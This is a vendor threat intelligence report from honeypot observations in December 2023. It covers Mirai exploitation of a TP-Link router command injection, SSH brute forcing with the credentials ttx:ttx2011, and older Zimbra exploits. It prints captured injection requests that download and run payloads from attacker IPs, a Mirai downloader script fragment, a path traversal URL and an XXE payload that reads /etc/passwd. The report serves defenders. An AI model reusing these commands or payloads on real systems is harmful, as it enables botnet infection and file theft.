Our selection of alerts on honeypots: report 23 – December 2023

The following report consists of TEHTRIS observations on our worldwide honeypots network to provide you with information on what is going on the Internet. This actionable cyber threat intelligence is based on observations from a real and uncontrolled environment. Keeping track of trends and keeping an eye on what is actively scanned by threat actors in a reconnaissance phase allows to adequately adjust the cybersecurity posture.

Check out our previous report here.

During the past weeks, we monitored attempts to exploit CVE-2023-1389 in TP-Link Archer AX21 which was disclosed earlier this year. This command injection vulnerability allows an unauthenticated attack to inject commands, which would be run as root, with a simple POST request. We observed a peak on November 29th.

Timeline of CVE-2023-1389 exploit attempts over the past weeks

In our case, TEHTRIS Deceptive Response captured two different requests:

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; rm -rf shk; wget http[:]//45.95.146[.]26/shk; chmod 777 shk; ./shk tplink; rm -rf shk`)
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; for pid in $(ls /proc | grep -E '^[0-9]+$'); do grep -q '(deleted)' /proc/$pid/maps && kill -9 $pid || true; done; rm -rf lol; wget http[:]//94.156.68[.]152/lol; chmod 777 lol; ./lol tplink; rm -rf lol`)

Both IP 45.95.146[.]26 and 94.156.68[.]152 are known for being associated with Mirai botnet, and indeed, this vulnerability has been added to the botnet’s arsenal in May 2023. The files that are meant to be downloaded are:


binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
exec="your device just got infected to a bootnoot"
rm -rf $binout
for arch in $binarys
cd /tmp
cd /var
cd /dev
wget http://$server_ip/$binname.$arch -O $binout
curl -O $binout http://$server_ip/$binname.$arch
tftp -g -l $binout -r $binname.$arch $server_ip
chmod 777 $binout
./$binout $1
if [ "$status" = "$exec" ]


  • 120.63.180[.]123 🇮🇳
  • 185.224.128[.]160 🇳🇱
  • 5.248.2[.]235 🇺🇦
  • 185.224.128[.]31 🇳🇱
  • 179.43.163[.]130 🇨🇭
  • 45.95.146[.]26 🇳🇱
  • 94.156.68[.]152 🇧🇬

SSH bruteforce attacks: ttx:ttx2011

SSH bruteforce attempts are relentless. In the past 30 days, the top 10 credentials used by threat actors are the following:


Between December 6th and 8th, we monitored a surge in connection attempts using credentials ttx:ttx2011 coming from 2,287 unique IP addresses.  

Timeline of SSH bruteforce attempts with ttx:ttx2011

According to security researchers, these crendetials are used by ShellBot operators to compromise poorly secured Linux servers.

All of our honeypots were targeted by these bruteforce attempts. However, Taiwan accounted for 20% of all hits, Indonesia for 13%, and Singapore and Thailand for 9%.


  • 170.64.208[.]208
  • 117.6.44[.]221
  • 186.67.248[.]6
  • 188.18.49[.]50
  • 27.131.36[.]170
  • 43.153.35[.]39
  • 103.76.123[.]85
  • 118.70.170[.]120
  • 129.226.83[.]30

Attempts to exploit vulnerabilities in older versions of Zimbra

Zimbra is a collaborative software suite that includes an email server and a web client. This software is often targeted by threat actors – just recently, researchers pointed out that a zero-day flaw tracked as CVE-2023-37580 (CVSS3 6.1) was actively used in the wild to target international government organizations. Well, it appears that older Zimbra vulnerabilities are still used in the wild for initial access. These past two weeks, we observed two IP addresses attempting to exploit three Zimbra vulnerabilities:

  • CVE-2013-7091 (CVSS N/A), a directory traversal vulnerability in Zimbra 7.2.2 and 8.0.2 allowing attackers to read arbitrary files. The exploit is available with Metasploit.

URL: /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

  • CVE-2018-14013 (CVSS3 6.1), a cross-site scripting (XSS) vulnerability in versions before 8.8.11

URL decode:

  • CVE-2019-9670 (CVSS3 9.8), an XML External Entity Injection (XXE) vulnerability. The exploit is available with Metasploit.




'<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>'


  • 83.97.73[.]87
  • 52.87.238[.]153

Exploit attempts against Zeroshell

Want to learn more on this subject?

More insights on this research issued from the alerts on our worldwide honeypots network.

Subscribe to our bi-monthly threat intelligence newsletter

    Where do most attacks come from ?

    Want to learn more on this subject?

    More insights on this research issued from the alerts on our worldwide honeypots network.

    Subscribe to our bi-monthly threat intelligence newsletter

      Information remain TEHTRIS sole property and reproduction is forbidden

      TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.

      No warranty and liability

      TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.